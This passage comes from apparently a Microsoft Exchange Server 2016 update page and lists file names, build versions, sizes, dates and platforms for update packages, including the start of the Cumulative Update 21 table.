18,808| 4-Oct-21| 9:21| x86 \nMicrosoft.exchange.um.callrouter.exe| 15.1.2375.12| 22,408| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.um.clientstrings.dll| 15.1.2375.12| 60,304| 4-Oct-21| 7:53| x86 \nMicrosoft.exchange.um.grammars.dll| 15.1.2375.12| 211,856| 4-Oct-21| 7:48| x86 \nMicrosoft.exchange.um.lad.dll| 15.1.2375.12| 120,720| 4-Oct-21| 7:48| x64 \nMicrosoft.exchange.um.prompts.dll| 15.1.2375.12| 214,904| 4-Oct-21| 7:48| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.1.2375.12| 118,664| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.um.ucmaplatform.dll| 15.1.2375.12| 239,504| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.1.2375.12| 925,064| 4-Oct-21| 9:13| x86 \nMicrosoft.exchange.um.umcore.dll| 15.1.2375.12| 1,471,888| 4-Oct-21| 9:20| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.1.2375.12| 32,656| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.1.2375.12| 41,864| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.1.2375.12| 24,952| 4-Oct-21| 8:42| x86 \nMicrosoft.exchange.unifiedmessaging.eventlog.dll| 15.1.2375.12| 130,448| 4-Oct-21| 7:53| x64 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.1.2375.12| 15,240| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.1.2375.12| 83,344| 4-Oct-21| 9:40| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.1.2375.12| 50,064| 4-Oct-21| 9:40| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.1.2375.12| 658,832| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.1.2375.12| 186,240| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.1.2375.12| 67,472| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.1.2375.12| 12,688| 4-Oct-21| 7:51| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.1.2375.12| 56,712| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.1.2375.12| 28,048| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.1.2375.12| 120,696| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.1.2375.12| 31,608| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.1.2375.12| 57,208| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.1.2375.12| 35,728| 4-Oct-21| 7:50| x86 \nMicrosoft.exchange.webservices.dll| 15.1.2375.12| 1,054,088| 4-Oct-21| 7:47| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.1.2375.12| 67,960| 4-Oct-21| 7:50| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.1.2375.12| 23,440| 4-Oct-21| 9:05| x86 \nMicrosoft.exchange.wopiclient.dll| 15.1.2375.12| 76,176| 4-Oct-21| 8:07| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.1.2375.12| 17,288| 4-Oct-21| 7:54| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.1.2375.12| 29,048| 4-Oct-21| 7:50| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.1.2375.12| 505,224| 4-Oct-21| 8:53| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.1.2375.12| 14,712| 4-Oct-21| 7:52| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.1.2375.12| 36,752| 4-Oct-21| 8:09| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.1.2375.12| 66,440| 4-Oct-21| 9:00| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.1.2375.12| 19,344| 4-Oct-21| 7:47| x86 \nMicrosoft.filtering.dll| 15.1.2375.12| 113,040| 4-Oct-21| 8:19| x86 \nMicrosoft.filtering.exchange.dll| 15.1.2375.12| 57,224| 4-Oct-21| 9:10| x86 \nMicrosoft.filtering.interop.dll| 15.1.2375.12| 15,224| 4-Oct-21| 8:19| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.1.2375.12| 46,976| 4-Oct-21| 8:32| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.1.2375.12| 15,760| 4-Oct-21| 7:53| x64 \nMicrosoft.forefront.filtering.common.dll| 15.1.2375.12| 23,928| 4-Oct-21| 7:48| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.1.2375.12| 22,392| 4-Oct-21| 7:47| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.1.2375.12| 34,184| 4-Oct-21| 7:50| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,941| 4-Oct-21| 9:50| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,317| 4-Oct-21| 9:50| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.1.2375.12| 1,518,968| 4-Oct-21| 10:33| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.1.2375.12| 13,192| 4-Oct-21| 7:50| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.1.2375.12| 33,160| 4-Oct-21| 10:10| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.1.2375.12| 18,296| 4-Oct-21| 7:48| x86 \nMicrosoft.forefront.reporting.common.dll| 15.1.2375.12| 45,968| 4-Oct-21| 9:10| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.1.2375.12| 50,576| 4-Oct-21| 9:12| x86 \nMicrosoft.isam.esent.collections.dll| 15.1.2375.12| 72,592| 4-Oct-21| 8:08| x86 \nMicrosoft.isam.esent.interop.dll| 15.1.2375.12| 534,392| 4-Oct-21| 8:07| x86 \nMicrosoft.managementgui.dll| 15.1.2375.12| 133,504| 4-Oct-21| 7:47| x86 \nMicrosoft.mce.interop.dll| 15.1.2375.12| 24,456| 4-Oct-21| 7:47| x86 \nMicrosoft.office.audit.dll| 15.1.2375.12| 123,784| 4-Oct-21| 7:47| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.1.2375.12| 585,608| 4-Oct-21| 8:14| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.1.2375.12| 42,376| 4-Oct-21| 8:07| x86 \nMicrosoft.office.compliance.console.core.dll| 15.1.2375.12| 217,984| 4-Oct-21| 11:31| x86 \nMicrosoft.office.compliance.console.dll| 15.1.2375.12| 854,928| 4-Oct-21| 11:50| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.1.2375.12| 485,776| 4-Oct-21| 11:40| x86 \nMicrosoft.office.compliance.core.dll| 15.1.2375.12| 412,040| 4-Oct-21| 8:11| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.1.2375.12| 36,232| 4-Oct-21| 8:07| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.1.2375.12| 85,376| 4-Oct-21| 9:07| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.1.2375.12| 1,783,176| 4-Oct-21| 8:07| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.1.2375.12| 49,544| 4-Oct-21| 9:06| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.1.2375.12| 27,536| 4-Oct-21| 9:20| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.1.2375.12| 174,992| 4-Oct-21| 8:11| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.1.2375.12| 166,264| 4-Oct-21| 8:42| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.1.2375.12| 40,336| 4-Oct-21| 7:47| x86 \nMicrosoft.online.box.shell.dll| 15.1.2375.12| 46,456| 4-Oct-21| 7:47| x86 \nMicrosoft.powershell.hostingtools.dll| 15.1.2375.12| 67,976| 4-Oct-21| 7:47| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.1.2375.12| 67,976| 4-Oct-21| 7:47| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.1.2375.12| 120,192| 4-Oct-21| 8:07| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,106| 4-Oct-21| 8:07| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,044| 4-Oct-21| 8:08| Not applicable \nMovemailbox.ps1| Not applicable| 61,108| 4-Oct-21| 8:07| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,582| 4-Oct-21| 8:07| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,512| 4-Oct-21| 8:08| Not applicable \nMpgearparser.dll| 15.1.2375.12| 99,728| 4-Oct-21| 7:52| x64 \nMsclassificationadapter.dll| 15.1.2375.12| 248,696| 4-Oct-21| 7:52| x64 \nMsexchangecompliance.exe| 15.1.2375.12| 78,728| 4-Oct-21| 9:29| x86 \nMsexchangedagmgmt.exe| 15.1.2375.12| 25,472| 4-Oct-21| 9:20| x86 \nMsexchangedelivery.exe| 15.1.2375.12| 38,776| 4-Oct-21| 9:20| x86 \nMsexchangefrontendtransport.exe| 15.1.2375.12| 31,624| 4-Oct-21| 9:10| x86 \nMsexchangehmhost.exe| 15.1.2375.12| 27,016| 4-Oct-21| 10:32| x86 \nMsexchangehmrecovery.exe| 15.1.2375.12| 29,576| 4-Oct-21| 8:42| x86 \nMsexchangemailboxassistants.exe| 15.1.2375.12| 72,568| 4-Oct-21| 9:20| x86 \nMsexchangemailboxreplication.exe| 15.1.2375.12| 20,872| 4-Oct-21| 9:24| x86 \nMsexchangemigrationworkflow.exe| 15.1.2375.12| 69,520| 4-Oct-21| 9:29| x86 \nMsexchangerepl.exe| 15.1.2375.12| 71,048| 4-Oct-21| 9:20| x86 \nMsexchangesubmission.exe| 15.1.2375.12| 123,256| 4-Oct-21| 9:23| x86 \nMsexchangethrottling.exe| 15.1.2375.12| 39,816| 4-Oct-21| 8:32| x86 \nMsexchangetransport.exe| 15.1.2375.12| 74,120| 4-Oct-21| 8:32| x86 \nMsexchangetransportlogsearch.exe| 15.1.2375.12| 139,128| 4-Oct-21| 9:10| x86 \nMsexchangewatchdog.exe| 15.1.2375.12| 55,672| 4-Oct-21| 7:53| x64 \nMspatchlinterop.dll| 15.1.2375.12| 53,648| 4-Oct-21| 8:08| x64 \nNativehttpproxy.dll| 15.1.2375.12| 91,536| 4-Oct-21| 7:53| x64 \nNavigatorparser.dll| 15.1.2375.12| 636,816| 4-Oct-21| 7:51| x64 \nNego2nativeinterface.dll| 15.1.2375.12| 19,344| 4-Oct-21| 7:52| x64 \nNegotiateclientcertificatemodule.dll| 15.1.2375.12| 30,072| 4-Oct-21| 7:52| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 22,248| 4-Oct-21| 8:08| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,559| 4-Oct-21| 8:07| Not applicable \nNtspxgen.dll| 15.1.2375.12| 80,760| 4-Oct-21| 7:54| x64 \nOleconverter.exe| 15.1.2375.12| 173,968| 4-Oct-21| 7:52| x64 \nOutsideinmodule.dll| 15.1.2375.12| 87,928| 4-Oct-21| 7:53| x64 \nOwaauth.dll| 15.1.2375.12| 92,048| 4-Oct-21| 7:53| x64 \nOwasmime.msi| Not applicable| 720,896| 4-Oct-21| 8:07| Not applicable \nPerf_common_extrace.dll| 15.1.2375.12| 245,128| 4-Oct-21| 7:48| x64 \nPerf_exchmem.dll| 15.1.2375.12| 85,896| 4-Oct-21| 7:51| x64 \nPipeline2.dll| 15.1.2375.12| 1,454,472| 4-Oct-21| 8:09| x64 \nPowershell.rbachostingtools.dll_1bf4f3e363ef418781685d1a60da11c1| 15.1.2375.12| 41,352| 4-Oct-21| 9:53| Not applicable \nPreparemoverequesthosting.ps1| Not applicable| 70,975| 4-Oct-21| 8:08| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,209| 4-Oct-21| 8:08| Not applicable \nProductinfo.managed.dll| 15.1.2375.12| 27,000| 4-Oct-21| 7:47| x86 \nProxybinclientsstringsdll| 15.1.2375.12| 924,536| 4-Oct-21| 7:52| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,218| 4-Oct-21| 8:07| Not applicable \nQuietexe.exe| 15.1.2375.12| 14,712| 4-Oct-21| 7:52| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,532| 4-Oct-21| 7:55| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,675| 4-Oct-21| 9:46| Not applicable \nRemoteexchange.ps1| Not applicable| 23,573| 4-Oct-21| 9:50| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,664| 4-Oct-21| 8:07| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 14,986| 4-Oct-21| 8:08| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,012| 4-Oct-21| 8:08| Not applicable \nReplaycrimsonmsg.dll| 15.1.2375.12| 1,099,144| 4-Oct-21| 7:47| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,460| 4-Oct-21| 9:46| Not applicable \nResetcasservice.ps1| Not applicable| 21,687| 4-Oct-21| 8:07| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,081| 4-Oct-21| 7:51| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,141| 4-Oct-21| 8:11| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,194| 4-Oct-21| 7:55| Not applicable \nRightsmanagementwrapper.dll| 15.1.2375.12| 86,392| 4-Oct-21| 8:07| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,770| 4-Oct-21| 8:07| Not applicable \nRpcperf.dll| 15.1.2375.12| 23,416| 4-Oct-21| 7:50| x64 \nRpcproxyshim.dll| 15.1.2375.12| 39,288| 4-Oct-21| 8:08| x64 \nRulesauditmsg.dll| 15.1.2375.12| 12,664| 4-Oct-21| 7:51| x64 \nRwsperfcounters.xml| Not applicable| 23,044| 4-Oct-21| 9:57| Not applicable \nSafehtmlnativewrapper.dll| 15.1.2375.12| 34,696| 4-Oct-21| 7:50| x64 \nScanenginetest.exe| 15.1.2375.12| 956,304| 4-Oct-21| 8:07| x64 \nScanningprocess.exe| 15.1.2375.12| 739,208| 4-Oct-21| 8:10| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,792| 4-Oct-21| 8:07| Not applicable \nServicecontrol.ps1| Not applicable| 52,329| 4-Oct-21| 8:11| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,734| 4-Oct-21| 8:08| Not applicable \nSettingsadapter.dll| 15.1.2375.12| 116,104| 4-Oct-21| 7:53| x64 \nSetup.exe| 15.1.2375.12| 21,384| 4-Oct-21| 8:07| x86 \nSetupui.exe| 15.1.2375.12| 49,032| 4-Oct-21| 9:45| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,169| 4-Oct-21| 8:07| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,827| 4-Oct-21| 7:55| Not applicable \nStatisticsutil.dll| 15.1.2375.12| 142,200| 4-Oct-21| 8:07| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,117| 4-Oct-21| 7:55| Not applicable \nStoretsconstants.ps1| Not applicable| 15,810| 4-Oct-21| 8:07| Not applicable \nStoretslibrary.ps1| Not applicable| 27,983| 4-Oct-21| 8:07| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.1.2375.12| 28,536| 4-Oct-21| 7:50| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,911| 4-Oct-21| 8:07| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 43,953| 4-Oct-21| 8:07| Not applicable \nTest_mitigationserviceconnectivity.ps1| Not applicable| 14,170| 4-Oct-21| 8:07| Not applicable \nTextconversionmodule.dll| 15.1.2375.12| 86,400| 4-Oct-21| 7:53| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,707| 4-Oct-21| 8:07| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,413| 4-Oct-21| 8:07| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,009| 4-Oct-21| 8:07| Not applicable \nUmservice.exe| 15.1.2375.12| 100,232| 4-Oct-21| 9:20| x86 \nUmworkerprocess.exe| 15.1.2375.12| 38,288| 4-Oct-21| 9:20| x86 \nUninstall_antispamagents.ps1| Not applicable| 15,453| 4-Oct-21| 7:51| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,010| 4-Oct-21| 8:08| Not applicable \nUpdatecas.ps1| Not applicable| 35,343| 4-Oct-21| 8:11| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,742| 4-Oct-21| 8:11| Not applicable \nUpdateserver.exe| 15.1.2375.12| 3,014,544| 4-Oct-21| 8:07| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,136| 4-Oct-21| 8:07| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 32,048| 4-Oct-21| 11:29| Not applicable \nWsbexchange.exe| 15.1.2375.12| 125,328| 4-Oct-21| 8:08| x64 \nX400prox.dll| 15.1.2375.12| 103,312| 4-Oct-21| 7:53| x64 \n_search.lingoperators.a| 15.1.2375.12| 34,680| 4-Oct-21| 9:00| Not applicable \n_search.lingoperators.b| 15.1.2375.12| 34,680| 4-Oct-21| 9:00| Not applicable \n_search.mailboxoperators.a| 15.1.2375.12| 288,640| 4-Oct-21| 9:20| Not applicable \n_search.mailboxoperators.b| 15.1.2375.12| 288,640| 4-Oct-21| 9:20| Not applicable \n_search.operatorschema.a| 15.1.2375.12| 483,216| 4-Oct-21| 8:52| Not applicable \n_search.operatorschema.b| 15.1.2375.12| 483,216| 4-Oct-21| 8:52| Not applicable \n_search.tokenoperators.a| 15.1.2375.12| 106,872| 4-Oct-21| 9:00| Not applicable \n_search.tokenoperators.b| 15.1.2375.12| 106,872| 4-Oct-21| 9:00| Not applicable \n_search.transportoperators.a| 15.1.2375.12| 64,904| 4-Oct-21| 9:24| Not applicable \n_search.transportoperators.b| 15.1.2375.12| 64,904| 4-Oct-21| 9:24| Not applicable \n \n## \n\n__\n\nMicrosoft Exchange Server 2016 Cumulative Update 21\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.1.2308.15| 71,032| 25-Sep-21| 7:03| x64| \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,502| 25-Sep-21| 7:01| Not applicable| \nAdduserstopfrecursive.ps1| Not applicable| 14,921| 25-Sep-21| 7:03| Not applicable| \nAdemodule.dll| 15.1.2308.15| 106,376| 25-Sep-21| 7:00| x64| \nAirfilter.dll| 15.1.2308.15| 42,888| 25-Sep-21| 7:03| x64| \nAjaxcontroltoolkit.dll| 15.1.2308.15| 92,552| 25-Sep-21| 7:00| x86| \nAntispamcommon.ps1| Not applicable| 13,501| 25-Sep-21| 7:03| Not applicable| \nAsdat.msi| Not applicable| 5,087,232| 25-Sep-21| 7:04| Not applicable| \nAsentirs.msi| Not applicable| 77,824| 25-Sep-21| 7:04| Not applicable| \nAsentsig.msi| Not applicable| 73,728| 25-Sep-21| 7:04| Not applicable| \nBigfunnel.bondtypes.dll| 15.1.2308.15| 43,920| 25-Sep-21| 7:00| x86| \nBigfunnel.common.dll| 15.1.2308.15| 63,888| 25-Sep-21| 7:01| x86| \nBigfunnel.configuration.dll| 15.1.2308.15| 99,216| 25-Sep-21| 7:01| x86| \nBigfunnel.entropy.dll| 15.1.2308.15| 44,400| 25-Sep-21| 7:01| x86| \nBigfunnel.filter.dll| 15.1.2308.15| 54,160| 25-Sep-21| 7:02| x86| \nBigfunnel.indexstream.dll| 15.1.2308.15| 54,152| 25-Sep-21| 7:01| x86| \nBigfunnel.poi.dll| 15.1.2308.15| 203,656| 25-Sep-21| 7:01| x86| \nBigfunnel.postinglist.dll| 15.1.2308.15| 122,232| 25-Sep-21| 7:01| x86| \nBigfunnel.query.dll| 15.1.2308.15| 99,720| 25-Sep-21| 7:01| x86| \nBigfunnel.ranking.dll| 15.1.2308.15| 79,248| 25-Sep-21| 7:03| x86| \nBigfunnel.syntheticdatalib.dll| 15.1.2308.15| 3,634,576| 25-Sep-21| 7:00| x86| \nBigfunnel.wordbreakers.dll| 15.1.2308.15| 46,480| 25-Sep-21| 7:01| x86| \nCafe_airfilter_dll| 15.1.2308.15| 42,888| 25-Sep-21| 7:03| x64| \nCafe_exppw_dll| 15.1.2308.15| 83,336| 25-Sep-21| 7:00| x64| \nCafe_owaauth_dll| 15.1.2308.15| 92,040| 25-Sep-21| 7:02| x64| \nCalcalculation.ps1| Not applicable| 42,089| 25-Sep-21| 7:03| Not applicable| \nCheckdatabaseredundancy.ps1| Not applicable| 94,602| 25-Sep-21| 7:04| Not applicable| \nChksgfiles.dll| 15.1.2308.15| 57,224| 25-Sep-21| 7:02| x64| \nCitsconstants.ps1| Not applicable| 15,837| 25-Sep-21| 7:03| Not applicable| \nCitslibrary.ps1| Not applicable| 82,696| 25-Sep-21| 7:03| Not applicable| \nCitstypes.ps1| Not applicable| 14,496| 25-Sep-21| 7:03| Not applicable| \nClassificationengine_mce| 15.1.2308.15| 1,693,064| 25-Sep-21| 7:02| Not applicable| \nClusmsg.dll| 15.1.2308.15| 134,024| 25-Sep-21| 7:02| x64| \nCoconet.dll| 15.1.2308.15| 48,008| 25-Sep-21| 7:03| x64| \nCollectovermetrics.ps1| Not applicable| 81,676| 25-Sep-21| 7:03| Not applicable| \nCollectreplicationmetrics.ps1| Not applicable| 41,894| 25-Sep-21| 7:04| Not applicable| \nCommonconnectfunctions.ps1| Not applicable| 29,923| 25-Sep-21| 7:03| Not applicable| \nComplianceauditservice.exe| 15.1.2308.15| 39,824| 25-Sep-21| 7:01| x86| \nConfigureadam.ps1| Not applicable| 22,760| 25-Sep-21| 7:03| Not applicable| \nConfigurecaferesponseheaders.ps1| Not applicable| 20,340| 25-Sep-21| 7:03| Not applicable| \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,766| 25-Sep-21| 7:03| Not applicable| \nConfiguresmbipsec.ps1| Not applicable| 39,840| 25-Sep-21| 7:03| Not applicable| \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,291| 25-Sep-21| 7:03| Not applicable| \nConnectfunctions.ps1| Not applicable| 37,157| 25-Sep-21| 7:03| Not applicable| \nConnect_exchangeserver_help.xml| Not applicable| 30,432| 25-Sep-21| 7:03| Not applicable| \nConsoleinitialize.ps1| Not applicable| 24,244| 25-Sep-21| 7:02| Not applicable| \nConvertoabvdir.ps1| Not applicable| 20,065| 25-Sep-21| 7:03| Not applicable| \nConverttomessagelatency.ps1| Not applicable| 14,544| 25-Sep-21| 7:03| Not applicable| \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,761| 25-Sep-21| 7:03| Not applicable| \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,908| 25-Sep-21| 7:03| Not applicable| \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 512| 25-Sep-21| 2:20| Not applicable| \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 512| 25-Sep-21| 2:20| Not applicable| \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 512| 25-Sep-21| 2:20| Not applicable| \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 512| 25-Sep-21| 2:20| Not applicable| \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 512| 25-Sep-21| 2:20| Not applicable| \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 512| 25-Sep-21| 2:20| Not applicable| \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 512| 25-Sep-21| 2:20| Not applicable| \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 512| 25-Sep-21| 2:20| Not applicable| \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 512| 25-Sep-21| 2:20| Not applicable| \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 512| 25-Sep-21| 2:20| Not applicable| \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 512| 25-Sep-21| 2:20| Not applicable| \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 512| 25-Sep-21| 2:20| Not applicable| \nCts_exsmime.dll| 15.1.2308.15| 380,808| 25-Sep-21| 7:02| x64| \nCts_microsoft.exchange.data.common.dll| 15.1.2308.15| 1,686,928| 25-Sep-21| 7:03| x86| \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 512| 25-Sep-21| 2:20| Not applicable| \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.1.2308.15| 13,176| 25-Sep-21| 7:03| x86| \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.1.2308.15| 13,184| 25-Sep-21| 7:02| x86| \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.1.2308.15| 13,192| 25-Sep-21| 7:02| x86| \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.1.2308.15| 13,176| 25-Sep-21| 7:03| x86| \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.1.2308.15| 13,192| 25-Sep-21| 7:03| x86| \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.1.2308.15| 13,192| 25-Sep-21| 7:02| x86| \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.1.2308.15| 13,192| 25-Sep-21| 7:03| x86| \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.1.2308.15| 13,192| 25-Sep-21| 7:02| x86| \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.1.2308.15| 13,192| 25-Sep-21| 7:02| x86| \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.1.2308.15| 12,672| 25-Sep-21| 7:02| x86| \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.1.2308.15| 12,680| 25-Sep-21| 7:02| x86| \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.1.2308.15| 12,680| 25-Sep-21| 7:02| x86| \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.1.2308.15| 12,680| 25-Sep-21| 7:02| x86| \nDagcommonlibrary.ps1| Not applicable| 60,234| 25-Sep-21| 7:03| Not applicable| \nDependentassemblygenerator.exe| 15.1.2308.15| 22,400| 25-Sep-21| 7:01| x86| \nDiaghelper.dll| 15.1.2308.15| 66,960| 25-Sep-21| 7:01| x86| \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,330| 25-Sep-21| 7:03| Not applicable| \nDisableinmemorytracing.ps1| Not applicable| 13,358| 25-Sep-21| 7:03| Not applicable| \nDisable_antimalwarescanning.ps1| Not applicable| 15,213| 25-Sep-21| 7:03| Not applicable| \nDisable_outsidein.ps1| Not applicable| 13,650| 25-Sep-21| 7:03| Not applicable| \nDisklockerapi.dll| Not applicable| 22,392| 25-Sep-21| 7:03| x64| \nDlmigrationmodule.psm1| Not applicable| 39,572| 25-Sep-21| 7:03| Not applicable| \nDsaccessperf.dll| 15.1.2308.15| 45,960| 25-Sep-21| 7:03| x64| \nDscperf.dll| 15.1.2308.15| 32,640| 25-Sep-21| 7:04| x64| \nDup_cts_microsoft.exchange.data.common.dll| 15.1.2308.15| 1,686,928| 25-Sep-21| 7:03| x86| \nDup_ext_microsoft.exchange.data.transport.dll| 15.1.2308.15| 601,472| 25-Sep-21| 7:01| x86| \nEcpperfcounters.xml| Not applicable| 31,180| 25-Sep-21| 7:03| Not applicable| \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 515| 25-Sep-21| 2:20| Not applicable| \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.1.2308.15| 13,176| 25-Sep-21| 7:03| x86| \nEdgetransport.exe| 15.1.2308.15| 49,544| 25-Sep-21| 7:01| x86| \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 515| 25-Sep-21| 2:20| Not applicable| \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 515| 25-Sep-21| 2:20| Not applicable| \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 515| 25-Sep-21| 2:20| Not applicable| \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 515| 25-Sep-21| 2:20| Not applicable| \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 515| 25-Sep-21| 2:20| Not applicable| \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 515| 25-Sep-21| 2:20| Not applicable| \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 515| 25-Sep-21| 2:20| Not applicable| \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 515| 25-Sep-21| 2:20| Not applicable| \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 515| 25-Sep-21| 